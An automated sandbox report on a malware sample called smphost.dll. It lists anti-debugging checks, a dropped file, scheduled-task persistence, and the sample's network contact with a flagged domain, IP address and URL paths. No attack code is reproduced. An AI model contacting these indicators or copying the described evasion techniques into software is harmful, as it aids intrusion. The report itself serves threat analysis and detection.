Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: eCATR3i7EpbaN9iNfeSlpa+LReiKwHVl5h2XxKhGfSRSHDvGdRfoP4L+/8cPCQAA
Source: regsvr32.exe, 00000002.00000003.365421594.0000000004F40000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.371091543.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.370554878.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367324157.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.361237594.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000003.367859434.0000000004F60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Anti Debugging
barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, 2_2_6E9E9CF7
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EFE17 GetProcessHeap, 2_2_6E9EFE17
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E1710 mov eax, dword ptr fs:[00000030h] 2_2_6E9E1710
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E1490 mov eax, dword ptr fs:[00000030h] 2_2_6E9E1490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] 2_2_6E9E83B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EC865 mov eax, dword ptr fs:[00000030h] 2_2_6E9EC865
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] 2_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F841710 mov eax, dword ptr fs:[00000030h] 38_2_6F841710
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F841490 mov eax, dword ptr fs:[00000030h] 38_2_6F841490
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F8483B0 mov eax, dword ptr fs:[00000030h] 38_2_6F8483B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F84E9B4 mov eax, dword ptr fs:[00000030h] 38_2_6F84E9B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F84C865 mov eax, dword ptr fs:[00000030h] 38_2_6F84C865
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6E9E9AED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E9EC0A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F849AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 38_2_6F849AED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F84C0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_6F84C0A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_6F849839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 38_2_6F849839

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.14.31.158 32710 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: manageintel.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 Jump to behavior

Language, Device and Operating System Detection
barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E9658 cpuid 2_2_6E9E9658
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_6E9E99A8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, 2_2_6E9E8630
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562835 Sample: smphost.dll Startdate: 30/01/2022 Architecture: WINDOWS Score: 88 37 manageintel.com 2->37 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Sigma detected: Schedule system process 2->51 53 3 other signatures 2->53 8 loaddll32.exe 1 2->8         started        10 regsvr32.exe 2->10         started        12 regsvr32.exe 2->12         started        signatures3 process4 process5 14 regsvr32.exe 8 8->14         started        19 cmd.exe 1 8->19         started        21 rundll32.exe 8->21         started        27 2 other processes 8->27 23 regsvr32.exe 6 10->23         started        25 regsvr32.exe 12->25         started        dnsIp6 39 manageintel.com 185.14.31.158, 32710, 443, 49758 ITLDC-NLUA Ukraine 14->39 35 C:\ProgramData\6\5507.ocx, PE32 14->35 dropped 43 System process connects to network (likely due to code injection or exploit) 14->43 45 Uses schtasks.exe or at.exe to add and modify task schedules 14->45 29 WerFault.exe 23 9 14->29         started        31 schtasks.exe 14->31         started        33 rundll32.exe 19->33         started        41 192.168.2.1 unknown unknown 23->41 file7 signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.14.31.158
 manageintel.com Ukraine
21100 ITLDC-NLUA true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
manageintel.com 185.14.31.158 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://manageintel.com/WUzZRUBQje/Auth.php true
  • Avira URL Cloud: malware
 unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml true
  • Avira URL Cloud: safe
 unknown
https://manageintel.com/WUzZRUBQje/vAtVEC.xml true
  • Avira URL Cloud: safe
 unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml true
  • Avira URL Cloud: safe
 unknown